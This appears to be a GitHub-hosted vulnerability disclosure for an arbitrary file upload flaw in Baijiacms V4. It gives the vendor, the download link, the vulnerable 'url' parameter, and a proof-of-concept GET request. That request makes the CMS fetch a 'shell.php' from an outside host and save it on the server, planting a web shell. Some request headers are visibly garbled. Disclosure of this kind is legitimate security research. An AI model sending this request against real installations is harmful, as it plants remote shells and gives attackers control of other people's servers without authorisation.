Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Arbitrary file upload exists in Baijiacms

vendor:https://baijiacms.github.io/

download link:https://github.com/baijiacms/baijiacmsV4.git

Vulnerability trigger parameter:&url

The process of vulnerability discovery is as follows:

image

poc

GET
/CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=public&do=file&op=fetch&url=http://ip:port/shell.php&status=1&beid=1 HTTP/1.1 
Host:127.0.0.1
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64;x64; rv:91.0) Gecko/20100101 Firefox/91.0 
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language:zh-CN,zh;g=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, def late Gonnection: c lose 
Referer:
http://127.0.0.1/CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=manager&do=dev&beid=1 
Cookie: PHPSESSID=n3Ig3p80u2sdcgbrdI7paj8145 
Upgrade-Insecure-Requests:1 
Sec-Fetch-Dest: document 
Sec-Fetch-Mode: navigate 
Sec-Fetch-Site: same-origin 
Sec-Fetch-User:?1

Files can be downloaded from a remote server and saved locally image image